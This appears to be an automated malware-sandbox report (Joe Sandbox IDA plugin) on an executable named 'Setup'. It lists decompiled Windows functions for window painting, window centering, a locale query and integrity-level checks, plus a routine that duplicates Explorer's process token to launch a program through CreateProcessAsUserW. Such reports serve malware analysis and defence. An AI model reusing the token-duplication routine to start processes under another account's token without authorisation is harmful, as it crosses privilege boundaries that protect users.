                                                                                                                                                              0x005024c8
                                                                                                                                                              0x005024c8
                                                                                                                                                              0x005024cd
                                                                                                                                                              0x005024d3
                                                                                                                                                              0x005024d7
                                                                                                                                                              0x005024d9
                                                                                                                                                              0x005024dc
                                                                                                                                                              0x005024df
                                                                                                                                                              0x005024e2
                                                                                                                                                              0x005024e8
                                                                                                                                                              0x005024fc
                                                                                                                                                              0x00502506
                                                                                                                                                              0x00502518
                                                                                                                                                              0x0050251d
                                                                                                                                                              0x0050252b
                                                                                                                                                              0x00502530
                                                                                                                                                              0x00502537
                                                                                                                                                              0x0050253a
                                                                                                                                                              0x0050253a
                                                                                                                                                              0x0050253f
                                                                                                                                                              0x00502545
                                                                                                                                                              0x00502555
                                                                                                                                                              0x00502547
                                                                                                                                                              0x0050254b
                                                                                                                                                              0x00502550
                                                                                                                                                              0x005024fe
                                                                                                                                                              0x005024fe
                                                                                                                                                              0x005024fe
                                                                                                                                                              0x0050255a
                                                                                                                                                              0x0050256f

                                                                                                                                                              APIs
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000008,DDD124F9,?,00000000,00508795,000000FF,?,004E09FD,?,00000000,0000000C,0000005A,00000000), ref: 005024F3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                              • Opcode ID: 17bd02d61d5eac9d1e5b27f2e83d14d2623f1d078f5f65820668711d61e4f906
                                                                                                                                                              • Instruction ID: 22c70dcdf994eba1062f3603a9771be6de007e099f53124ee60974792897218f
                                                                                                                                                              • Opcode Fuzzy Hash: 17bd02d61d5eac9d1e5b27f2e83d14d2623f1d078f5f65820668711d61e4f906
                                                                                                                                                              • Instruction Fuzzy Hash: A9217F71A04118EBDB04DFA4DC55BEEB7B4FF08314F10462EE516AB2D0EB345A05CB58
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00495470 Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 139libraryloaderthreadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                              			E00495470(void* __edi, short* _a4, short* _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				struct HWND__* _v24;
				long _v28;
				intOrPtr _v32;
				int _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				struct HINSTANCE__* _v52;
				_Unknown_base(*)()* _v56;
				char _v128;
				void* _v132;
				signed short* _t47;
				int _t49;
				int _t56;
				int _t57;
				void* _t85;

				_t85 = __edi;
				if(_a4 == 0) {
					L2:
					return _t47;
				}
				_t47 = _a4;
				if(( *_t47 & 0x0000ffff) != 0) {
					_v20 = 0;
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					_t49 = E00494F20(__eflags) & 0x000000ff;
					__eflags = _t49;
					if(_t49 != 0) {
						_v28 = 0;
						_t49 = FindWindowW(L"Progman", 0);
						_v24 = _t49;
						__eflags = _v24;
						if(_v24 != 0) {
							_t49 = GetWindowThreadProcessId(_v24,  &_v28);
						}
						__eflags = _v28;
						if(__eflags != 0) {
							_v32 = E00494F60(__eflags, _v28);
							_t49 = E00494F60(__eflags, GetCurrentProcessId());
							_v36 = _t49;
							__eflags = _v36 - 0x3000;
							if(_v36 == 0x3000) {
								__eflags = _v32 - 0x2000;
								if(_v32 == 0x2000) {
									_t49 = OpenProcess(0x1f0fff, 0, _v28);
									_v40 = _t49;
									__eflags = _v40;
									if(_v40 != 0) {
										_t56 = OpenProcessToken(_v40, 0xf01ff,  &_v44);
										__eflags = _t56;
										if(_t56 != 0) {
											_t57 = DuplicateTokenEx(_v44, 0xf01ff, 0, 2, 1,  &_v48);
											__eflags = _t57;
											if(_t57 != 0) {
												_v56 = 0;
												_v52 = LoadLibraryW(L"AdvApi32");
												__eflags = _v52;
												if(_v52 != 0) {
													_v56 = GetProcAddress(_v52, "CreateProcessAsUserW");
												}
												__eflags = _v56;
												if(_v56 != 0) {
													_v132 = 0;
													E00451D90(_t85,  &_v128, 0, 0x40);
													_v56(_v48, _a4, _a8, 0, 0, 1, 0, 0, 0,  &_v132,  &_v20);
												}
												__eflags = _v52;
												if(_v52 != 0) {
													FreeLibrary(_v52);
												}
												CloseHandle(_v48);
											}
											CloseHandle(_v44);
										}
										_t49 = CloseHandle(_v40);
									}
								}
							}
						}
					}
					__eflags = _v12;
					if(_v12 != 0) {
						return _t49;
					}
					return ShellExecuteW(0, L"open", _a4, _a8, 0, 5);
				}
				goto L2;
			}























                                                                                                                                                              0x00495470
                                                                                                                                                              0x0049547d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049547f
                                                                                                                                                              0x00495487
                                                                                                                                                              0x0049548e
                                                                                                                                                              0x00495497
                                                                                                                                                              0x0049549a
                                                                                                                                                              0x0049549d
                                                                                                                                                              0x004954a5
                                                                                                                                                              0x004954a8
                                                                                                                                                              0x004954aa
                                                                                                                                                              0x004954b0
                                                                                                                                                              0x004954be
                                                                                                                                                              0x004954c4
                                                                                                                                                              0x004954c7
                                                                                                                                                              0x004954cb
                                                                                                                                                              0x004954d5
                                                                                                                                                              0x004954d5
                                                                                                                                                              0x004954db
                                                                                                                                                              0x004954df
                                                                                                                                                              0x004954f1
                                                                                                                                                              0x004954fb
                                                                                                                                                              0x00495503
                                                                                                                                                              0x00495506
                                                                                                                                                              0x0049550d
                                                                                                                                                              0x00495513
                                                                                                                                                              0x0049551a
                                                                                                                                                              0x0049552b
                                                                                                                                                              0x00495531
                                                                                                                                                              0x00495534
                                                                                                                                                              0x00495538
                                                                                                                                                              0x0049554b
                                                                                                                                                              0x00495551
                                                                                                                                                              0x00495553
                                                                                                                                                              0x0049556c
                                                                                                                                                              0x00495572
                                                                                                                                                              0x00495574
                                                                                                                                                              0x0049557a
                                                                                                                                                              0x0049558c
                                                                                                                                                              0x0049558f
                                                                                                                                                              0x00495593
                                                                                                                                                              0x004955a4
                                                                                                                                                              0x004955a4
                                                                                                                                                              0x004955a7
                                                                                                                                                              0x004955ab
                                                                                                                                                              0x004955ad
                                                                                                                                                              0x004955bc
                                                                                                                                                              0x004955e4
                                                                                                                                                              0x004955e4
                                                                                                                                                              0x004955e7
                                                                                                                                                              0x004955eb
                                                                                                                                                              0x004955f1
                                                                                                                                                              0x004955f1
                                                                                                                                                              0x004955fb
                                                                                                                                                              0x004955fb
                                                                                                                                                              0x00495605
                                                                                                                                                              0x00495605
                                                                                                                                                              0x0049560f
                                                                                                                                                              0x0049560f
                                                                                                                                                              0x00495538
                                                                                                                                                              0x0049551a
                                                                                                                                                              0x0049550d
                                                                                                                                                              0x004954df
                                                                                                                                                              0x00495615
                                                                                                                                                              0x00495619
                                                                                                                                                              0x00495637
                                                                                                                                                              0x00495637
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049562e
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • FindWindowW.USER32(Progman,00000000), ref: 004954BE
                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004954D5
                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004954F4
                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 0049552B
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,000F01FF,004DCC47), ref: 0049554B
                                                                                                                                                              • DuplicateTokenEx.ADVAPI32(004DCC47,000F01FF,00000000,00000002,00000001,?), ref: 0049556C
                                                                                                                                                              • LoadLibraryW.KERNEL32(AdvApi32), ref: 00495586
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0049559E
                                                                                                                                                              • _memset.LIBCMT ref: 004955BC
                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004955F1
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004955FB
                                                                                                                                                              • CloseHandle.KERNEL32(004DCC47), ref: 00495605
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0049560F
                                                                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0049562E
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Process$CloseHandle$LibraryOpenTokenWindow$AddressCurrentDuplicateExecuteFindFreeLoadProcShellThread_memset
                                                                                                                                                              • String ID: AdvApi32$CreateProcessAsUserW$Progman$open
                                                                                                                                                              • API String ID: 3124362906-4133358785
                                                                                                                                                              • Opcode ID: c75cb5961ac8ebdc9207d7be92574acba839f84e1e4393d84f04d315e8a1b28b
                                                                                                                                                              • Instruction ID: ede81cb90d584a8d042e1cf3f1dbbc8ceb3028ad12f52aa6004268a49ed220c0
                                                                                                                                                              • Opcode Fuzzy Hash: c75cb5961ac8ebdc9207d7be92574acba839f84e1e4393d84f04d315e8a1b28b
                                                                                                                                                              • Instruction Fuzzy Hash: BE514EB1A40208AFEF10DFA4DC49FEEBBB5BF58705F208429F605A62D0D7789944CB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0040B8E0 Relevance: 25.7, APIs: 17, Instructions: 192COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 97%
                                                                                                                                                              			E0040B8E0(void* __ebx, PAINTSTRUCT* __ecx, void* __edi, void* __esi, void* __eflags, int* _a16) {
				signed int _v8;
				struct tagPAINTSTRUCT _v76;
				struct tagRECT _v92;
				struct HBRUSH__* _v96;
				struct HDC__* _v100;
				struct tagPAINTSTRUCT _v164;
				struct HBITMAP__* _v168;
				struct tagRECT _v184;
				struct HDC__* _v188;
				struct HDC__* _v192;
				void* _v196;
				struct HBRUSH__* _v200;
				PAINTSTRUCT* _v204;
				intOrPtr* _v208;
				signed int _t75;
				void* _t80;
				void* _t123;
				void* _t169;
				void* _t170;
				signed int _t171;

				_t170 = __esi;
				_t169 = __edi;
				_t123 = __ebx;
				_t75 =  *0x561244; // 0xddd124f9
				_v8 = _t75 ^ _t171;
				_v204 = __ecx;
				if((E00412640(_v204 + 0x70, 0) & 0x000000ff) == 0) {
					if(E0041D530(_v204 + 0x70) == 0 || ( *(_v204 + 0x98) >> 0x00000003 & 0x00000001) == 0) {
						_t154 = _a16;
						 *_a16 = 0;
						_t80 = 0;
					} else {
						_t154 = _v204;
						_v188 = BeginPaint( *(_v204 + 4),  &_v164);
						if(_v188 != 0) {
							E00416BC0(_v204 + 4,  &_v184);
							_v168 = CreateCompatibleBitmap(_v188, _v184.right - _v184.left, _v184.bottom - _v184.top);
							if(_v168 != 0) {
								_v192 = CreateCompatibleDC(_v188);
								if(_v192 != 0) {
									_v196 = SelectObject(_v192, _v168);
									if(_v196 != 0) {
										_v200 = CreateSolidBrush( *(_v204 + 0xcc));
										if(_v200 != 0) {
											FillRect(_v192,  &_v184, _v200);
											DeleteObject(_v200);
											_v208 = E0041D530(_v204 + 0x70);
											 *((intOrPtr*)( *((intOrPtr*)( *_v208 + 0xc))))(_v208, 1, 0xffffffff, 0, 0, 0, _v192, _v204 + 0xb4, _v204 + 0xb4, 0, 0);
											BitBlt(_v188, 0, 0, _v184.right, _v184.bottom, _v192, 0, 0, 0xcc0020);
										}
										SelectObject(_v192, _v196);
									}
									DeleteDC(_v192);
								}
								DeleteObject(_v168);
							}
							_t154 =  &_v164;
							EndPaint( *(_v204 + 4),  &_v164);
							_t80 = 1;
						} else {
							_t80 = 0;
						}
					}
				} else {
					_t154 = _v204;
					_v100 = BeginPaint( *(_v204 + 4),  &_v76);
					if(_v100 != 0) {
						E00416BC0(_v204 + 4,  &_v92);
						_v96 = CreateSolidBrush( *(_v204 + 0xcc));
						if(_v96 != 0) {
							FillRect(_v100,  &_v92, _v96);
							DeleteObject(_v96);
						}
						_t154 =  &_v76;
						EndPaint( *(_v204 + 4),  &_v76);
						_t80 = 1;
					} else {
						_t80 = 0;
					}
				}
				return E0044F6C8(_t80, _t123, _v8 ^ _t171, _t154, _t169, _t170);
			}























                                                                                                                                                              0x0040b8e0
                                                                                                                                                              0x0040b8e0
                                                                                                                                                              0x0040b8e0
                                                                                                                                                              0x0040b8e9
                                                                                                                                                              0x0040b8f0
                                                                                                                                                              0x0040b8f3
                                                                                                                                                              0x0040b90e
                                                                                                                                                              0x0040b9b0
                                                                                                                                                              0x0040bbab
                                                                                                                                                              0x0040bbae
                                                                                                                                                              0x0040bbb4
                                                                                                                                                              0x0040b9ce
                                                                                                                                                              0x0040b9d5
                                                                                                                                                              0x0040b9e5
                                                                                                                                                              0x0040b9f2
                                                                                                                                                              0x0040ba0b
                                                                                                                                                              0x0040ba37
                                                                                                                                                              0x0040ba44
                                                                                                                                                              0x0040ba57
                                                                                                                                                              0x0040ba64
                                                                                                                                                              0x0040ba7e
                                                                                                                                                              0x0040ba8b
                                                                                                                                                              0x0040baa4
                                                                                                                                                              0x0040bab1
                                                                                                                                                              0x0040bacc
                                                                                                                                                              0x0040bad9
                                                                                                                                                              0x0040baed
                                                                                                                                                              0x0040bb33
                                                                                                                                                              0x0040bb5e
                                                                                                                                                              0x0040bb5e
                                                                                                                                                              0x0040bb72
                                                                                                                                                              0x0040bb72
                                                                                                                                                              0x0040bb7f
                                                                                                                                                              0x0040bb7f
                                                                                                                                                              0x0040bb8c
                                                                                                                                                              0x0040bb8c
                                                                                                                                                              0x0040bb92
                                                                                                                                                              0x0040bba3
                                                                                                                                                              0x0040bbb8
                                                                                                                                                              0x0040b9f4
                                                                                                                                                              0x0040b9f4
                                                                                                                                                              0x0040b9f4
                                                                                                                                                              0x0040b9f2
                                                                                                                                                              0x0040b914
                                                                                                                                                              0x0040b918
                                                                                                                                                              0x0040b928
                                                                                                                                                              0x0040b92f
                                                                                                                                                              0x0040b945
                                                                                                                                                              0x0040b95d
                                                                                                                                                              0x0040b964
                                                                                                                                                              0x0040b972
                                                                                                                                                              0x0040b97c
                                                                                                                                                              0x0040b97c
                                                                                                                                                              0x0040b982
                                                                                                                                                              0x0040b990
                                                                                                                                                              0x0040b996
                                                                                                                                                              0x0040b931
                                                                                                                                                              0x0040b931
                                                                                                                                                              0x0040b931
                                                                                                                                                              0x0040b92f
                                                                                                                                                              0x0040bbca

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Paint$Begin$BrushCreateDeleteFillObjectRectSolid
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1228145086-0
                                                                                                                                                              • Opcode ID: 979a330e3920737d0a737c78428a28417167aafa3c480625b42e8417f8bfcf09
                                                                                                                                                              • Instruction ID: 07e828fef3e79d3fcd88d721f4db20fa4bdc09ad6a6a4917d27f04c689f7129b
                                                                                                                                                              • Opcode Fuzzy Hash: 979a330e3920737d0a737c78428a28417167aafa3c480625b42e8417f8bfcf09
                                                                                                                                                              • Instruction Fuzzy Hash: 0B81FA71A00218DFEB64DBA4CC58F9AB775FB48304F0086D9E60DA7290DB74AE84CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00415CA0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 206COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 60%
                                                                                                                                                              			E00415CA0(struct HWND__** __ecx, struct HWND__* _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct tagRECT _v36;
				signed int _v40;
				struct HWND__* _v44;
				struct tagRECT _v60;
				struct tagRECT _v76;
				struct HMONITOR__* _v80;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				struct tagMONITORINFO _v120;
				int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				struct HWND__** _v140;
				long _t106;
				struct HMONITOR__* _t144;
				intOrPtr _t188;

				_v140 = __ecx;
				_v40 = E00416C00(_v140);
				if(_a4 == 0) {
					if((_v40 & 0x40000000) == 0) {
						_a4 = GetWindow( *_v140, 4);
					} else {
						_a4 = GetParent( *_v140);
					}
				}
				_t106 = GetWindowRect( *_v140,  &_v60);
				if((_v40 & 0x40000000) != 0) {
					_v44 = GetParent( *_v140);
					GetClientRect(_v44,  &_v76);
					GetClientRect(_a4,  &_v36);
					MapWindowPoints(_a4, _v44,  &_v36, 2);
					L24:
					_v16 = _v60.right - _v60.left;
					_t188 = _v60.bottom - _v60.top;
					_v20 = _t188;
					asm("cdq");
					asm("cdq");
					_v12 = (_v36.left + _v36.right - _t188 >> 1) - (_v16 - _t188 >> 1);
					asm("cdq");
					asm("cdq");
					_v8 = (_v36.top + _v36.bottom - _t188 >> 1) - (_v20 - _t188 >> 1);
					if(_v12 + _v16 > _v76.right) {
						_v12 = _v76.right - _v16;
					}
					if(_v12 < _v76.left) {
						_v12 = _v76.left;
					}
					if(_v8 + _v20 > _v76.bottom) {
						_v8 = _v76.bottom - _v20;
					}
					if(_v8 < _v76.top) {
						_v8 = _v76.top;
					}
					return SetWindowPos( *_v140, 0, _v12, _v8, 0xffffffff, 0xffffffff, 0x15);
				}
				if(_a4 != 0) {
					_t106 = GetWindowLongW(_a4, 0xfffffff0);
					_v128 = _t106;
					if((_v128 & 0x10000000) == 0 || (_v128 & 0x20000000) != 0) {
						_a4 = 0;
					}
				}
				_v80 = 0;
				if(_a4 == 0) {
					__imp__MonitorFromWindow( *_v140, 2);
					_v80 = _t106;
				} else {
					_t144 = _a4;
					__imp__MonitorFromWindow(_t144, 2);
					_v80 = _t144;
				}
				while(1) {
					_v132 = 0 | _v80 != 0x00000000;
					if(_v132 == 0) {
						break;
					}
					if(0 != 0) {
						continue;
					}
					_v120.cbSize = 0x28;
					_v124 = GetMonitorInfoW(_v80,  &_v120);
					while(1) {
						_v136 = 0 | _v124 != 0x00000000;
						if(_v136 == 0) {
							break;
						}
						if(0 != 0) {
							continue;
						}
						_v76.left = _v120.rcWork;
						_v76.top = _v96;
						_v76.right = _v92;
						_v76.bottom = _v88;
						if(_a4 != 0) {
							GetWindowRect(_a4,  &_v36);
						} else {
							_v36.left = _v76.left;
							_v36.top = _v76.top;
							_v36.right = _v76.right;
							_v36.bottom = _v76.bottom;
						}
						goto L24;
					}
					return 0;
				}
				return 0;
			}

























                                                                                                                                                              0x00415ca9
                                                                                                                                                              0x00415cba
                                                                                                                                                              0x00415cc1
                                                                                                                                                              0x00415ccb
                                                                                                                                                              0x00415cf2
                                                                                                                                                              0x00415ccd
                                                                                                                                                              0x00415cdc
                                                                                                                                                              0x00415cdc
                                                                                                                                                              0x00415ccb
                                                                                                                                                              0x00415d02
                                                                                                                                                              0x00415d11
                                                                                                                                                              0x00415e2a
                                                                                                                                                              0x00415e35
                                                                                                                                                              0x00415e43
                                                                                                                                                              0x00415e57
                                                                                                                                                              0x00415e5d
                                                                                                                                                              0x00415e63
                                                                                                                                                              0x00415e69
                                                                                                                                                              0x00415e6c
                                                                                                                                                              0x00415e75
                                                                                                                                                              0x00415e7f
                                                                                                                                                              0x00415e86
                                                                                                                                                              0x00415e8f
                                                                                                                                                              0x00415e99
                                                                                                                                                              0x00415ea0
                                                                                                                                                              0x00415eac
                                                                                                                                                              0x00415eb4
                                                                                                                                                              0x00415eb4
                                                                                                                                                              0x00415ebd
                                                                                                                                                              0x00415ec2
                                                                                                                                                              0x00415ec2
                                                                                                                                                              0x00415ece
                                                                                                                                                              0x00415ed6
                                                                                                                                                              0x00415ed6
                                                                                                                                                              0x00415edf
                                                                                                                                                              0x00415ee4
                                                                                                                                                              0x00415ee4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00415f00
                                                                                                                                                              0x00415d1b
                                                                                                                                                              0x00415d23
                                                                                                                                                              0x00415d29
                                                                                                                                                              0x00415d35
                                                                                                                                                              0x00415d42
                                                                                                                                                              0x00415d42
                                                                                                                                                              0x00415d35
                                                                                                                                                              0x00415d49
                                                                                                                                                              0x00415d54
                                                                                                                                                              0x00415d72
                                                                                                                                                              0x00415d78
                                                                                                                                                              0x00415d56
                                                                                                                                                              0x00415d58
                                                                                                                                                              0x00415d5c
                                                                                                                                                              0x00415d62
                                                                                                                                                              0x00415d62
                                                                                                                                                              0x00415d7b
                                                                                                                                                              0x00415d84
                                                                                                                                                              0x00415d8b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00415d96
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00415d98
                                                                                                                                                              0x00415dad
                                                                                                                                                              0x00415db0
                                                                                                                                                              0x00415db9
                                                                                                                                                              0x00415dc6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00415dd1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00415dd6
                                                                                                                                                              0x00415ddc
                                                                                                                                                              0x00415de2
                                                                                                                                                              0x00415de8
                                                                                                                                                              0x00415def
                                                                                                                                                              0x00415e13
                                                                                                                                                              0x00415df1
                                                                                                                                                              0x00415df4
                                                                                                                                                              0x00415dfa
                                                                                                                                                              0x00415e00
                                                                                                                                                              0x00415e06
                                                                                                                                                              0x00415e06
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00415e19
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00415dc8
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00416C00: GetWindowLongW.USER32(?,000000F0), ref: 00416C0F
                                                                                                                                                              • GetParent.USER32 ref: 00415CD6
                                                                                                                                                              • GetWindow.USER32(?,00000004), ref: 00415CEC
                                                                                                                                                              • GetWindowRect.USER32 ref: 00415D02
                                                                                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00415D23
                                                                                                                                                              • MonitorFromWindow.USER32(00000000,00000002), ref: 00415D5C
                                                                                                                                                              • MonitorFromWindow.USER32(?,00000002), ref: 00415D72
                                                                                                                                                              • GetMonitorInfoW.USER32 ref: 00415DA7
                                                                                                                                                              • GetWindowRect.USER32 ref: 00415E13
                                                                                                                                                              • GetParent.USER32(?), ref: 00415E24
                                                                                                                                                              • GetClientRect.USER32 ref: 00415E35
                                                                                                                                                              • GetClientRect.USER32 ref: 00415E43
                                                                                                                                                              • MapWindowPoints.USER32 ref: 00415E57
                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,000000FF,000000FF,00000015,?,?), ref: 00415F00
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Window$Rect$Monitor$ClientFromLongParent$InfoPoints
                                                                                                                                                              • String ID: (
                                                                                                                                                              • API String ID: 882428731-3887548279
                                                                                                                                                              • Opcode ID: 371a9545e01ad43f0f03d9c5f56726953ec5271821ee1bc8f5d6ecfa1c19fa72
                                                                                                                                                              • Instruction ID: caefe87467c79b1c1a426f3a6a43e1fc539b6a4d89845f412648e92d68bc3b50
                                                                                                                                                              • Opcode Fuzzy Hash: 371a9545e01ad43f0f03d9c5f56726953ec5271821ee1bc8f5d6ecfa1c19fa72
                                                                                                                                                              • Instruction Fuzzy Hash: 1591C674D00608DFDF14CFA8D988AEEBBB6BB88304F24C159E516A7394DB349A85CF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00494F60 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 98memoryCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00494F60(void* __eflags, char _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				void** _v20;
				long _v24;
				char* _v28;

				_v8 = 0x3000;
				if((E00494F20(__eflags) & 0x000000ff) != 0) {
					_v16 = 0;
					_t3 =  &_a4; // 0x4954ee
					_v12 = OpenProcess(0x1f0fff, 0,  *_t3);
					if(_v12 != 0) {
						if(OpenProcessToken(_v12, 0xf01ff,  &_v16) != 0) {
							_v20 = 0;
							_v24 = 0;
							if(GetTokenInformation(_v16, 0x19, 0, 0,  &_v24) == 0 && GetLastError() == 0x7a && _v24 != 0) {
								_v20 = HeapAlloc(GetProcessHeap(), 0, _v24);
							}
							if(_v20 != 0 && GetTokenInformation(_v16, 0x19, _v20, _v24,  &_v24) != 0) {
								_v28 = GetSidSubAuthorityCount( *_v20);
								if(_v28 != 0) {
									_v8 =  *(GetSidSubAuthority( *_v20, ( *_v28 & 0x000000ff) - 1));
								}
							}
							if(_v20 != 0) {
								HeapFree(GetProcessHeap(), 0, _v20);
							}
							CloseHandle(_v16);
						}
						CloseHandle(_v12);
					}
				}
				return _v8;
			}









                                                                                                                                                              0x00494f66
                                                                                                                                                              0x00494f77
                                                                                                                                                              0x00494f7d
                                                                                                                                                              0x00494f84
                                                                                                                                                              0x00494f95
                                                                                                                                                              0x00494f9c
                                                                                                                                                              0x00494fb7
                                                                                                                                                              0x00494fbd
                                                                                                                                                              0x00494fc4
